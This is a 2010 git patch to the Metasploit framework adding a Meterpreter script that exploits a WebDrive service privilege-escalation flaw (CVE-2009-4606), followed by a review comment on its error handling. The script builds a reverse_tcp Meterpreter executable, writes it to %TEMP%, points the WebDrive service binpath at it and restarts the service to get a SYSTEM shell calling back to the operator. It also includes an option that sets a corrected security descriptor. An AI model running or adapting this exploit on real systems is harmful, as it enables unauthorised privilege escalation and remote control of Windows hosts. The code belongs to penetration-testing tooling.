From 6f53dad3169e3fc9117c47471812d21e1c004151 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Thu, 28 Jan 2010 19:00:36 +0000
Subject: [PATCH] add priv escalation meterpreter script for SRT WebDrive bug
git-svn-id: file:///home/svn/framework3/trunk@8301 4d416f70-5f16-0410-b530-b9f4589650da
---
scripts/meterpreter/srt_webdrive_priv.rb | 121 +++++++++++++++++++++++
1 file changed, 121 insertions(+)
create mode 100644 scripts/meterpreter/srt_webdrive_priv.rb
diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb
new file mode 100644
index 0000000000..f4105f65e8
--- /dev/null
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -0,0 +1,121 @@
+# $Id$
+
+##
+# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
+#
+# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
+# Due to an empty security descriptor, a local attacker can gain elevated privileges.
+# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
+# Vulnerability mitigation featured.
+#
+# Credit:
+# - Discovery - Nine:Situations:Group::bellick
+# - Meterpreter script - Trancer
+#
+# References:
+# - http://retrogod.altervista.org/9sg_south_river_priv.html
+# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
+# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
+# - http://osvdb.org/show/osvdb/59080
+#
+# mtrancer[@]gmail.com
+# http://www.rec-sec.com
+##
+
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+ "-h" => [ false, "This help menu"],
+ "-m" => [ false, "Mitigate"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+sname = 'WebDriveService'
+pname = 'wdService.exe'
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+ case opt
+ when "-h"
+ print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ when "-m"
+ client.sys.process.get_processes().each do |m|
+ if ( m['name'] == pname )
+ print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+
+ # Set correct service security descriptor to mitigate the vulnerability
+ print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
+ client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+ end
+ end
+ raise Rex::Script::Completed
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
+end
+
+client.sys.process.get_processes().each do |m|
+ if ( m['name'] == pname )
+
+ print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+
+ # Build out the exe payload.
+ pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+ pay.datastore['LHOST'] = rhost
+ pay.datastore['LPORT'] = rport
+ raw = pay.generate
+
+ exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+
+ # Place our newly created exe in %TEMP%
+ tempdir = client.fs.file.expand_path("%TEMP%")
+ tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+ print_status("Sending EXE payload '#{tempexe}'.")
+ fd = client.fs.file.new(tempexe, "wb")
+ fd.write(exe)
+ fd.close
+
+ # Stop the vulnerable service
+ print_status("Stopping service \"#{sname}\"...")
+ client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+ # Set exe payload as service binpath
+ print_status("Setting \"#{sname}\" to #{tempexe}...")
+ client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
+ sleep(1)
+
+ # Restart the service
+ print_status("Restarting the \"#{sname}\" service...")
+ client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+ # Our handler to recieve the callback.
+ handler = client.framework.exploits.create("multi/handler")
+ handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+ handler.datastore['LHOST'] = rhost
+ handler.datastore['LPORT'] = rport
+ handler.datastore['ExitOnSession'] = false
+
+ handler.exploit_simple(
+ 'Payload' => handler.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+ )
+
+ # Set service binpath back to normal
+ client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
+
+ end
+end
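Review bot: The `-m` mitigation branch runs `sc sdset` through `client.sys.process.execute` and discards the result, so a rejected SDDL, a missing service or insufficient rights still ends in `raise Rex::Script::Completed` with the operator told the descriptor was set; the same unchecked pattern covers every `sc` call in the main path, including the final `sc config ... binpath=` restore. Running the command channelized (`{'Hidden' => true, 'Channelized' => true}`), reading its output and printing an error when `sc` does not report success would make the mitigation feature trustworthy. That restore also writes a hard-coded `%ProgramFiles%\WebDrive\#{pname}` instead of the binpath the service actually had, so a non-default install is left with a broken service; a comment such as `# NOTE: assumes the default install path; query the original binpath first` should at least document the assumption. The `fd = client.fs.file.new` / `fd.write` / `fd.close` sequence has no `ensure`, so a failed write leaks the remote handle, and `'Hidden' => 'true'` passes a string where a boolean is meant. Minor: `-p` uses `val.to_i`, which silently turns a malformed port into 0 where `Integer(val)` would fail loudly.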